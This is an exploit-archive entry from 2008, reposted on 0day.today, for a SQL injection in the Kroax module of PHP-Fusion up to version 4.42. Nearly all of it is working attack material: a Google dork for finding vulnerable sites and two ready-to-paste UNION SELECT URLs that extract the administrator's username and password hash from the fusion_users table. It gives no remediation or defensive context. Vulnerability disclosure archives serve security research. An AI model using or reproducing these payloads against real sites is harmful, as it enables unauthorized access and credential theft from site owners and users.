id: 3300
date: 06/25/2008
title: PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability
author: boom3rang
cves: 

===================================================================
PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability
===================================================================



--- Remote SQL Injection ---

[+]Google Dork:                               inurl:"kroax.php?category" 

--------------
 Exploit
--------------

example:

www.site.com/infusions/the_kroax/kroax.php?category= [SQL]



[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang


[+] password: 
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\


ps. To find username use first  "SQL" with table_name  user_name, and for password use second "SQL" with table_name user_password.



#  0day.today [2023-03-25]  #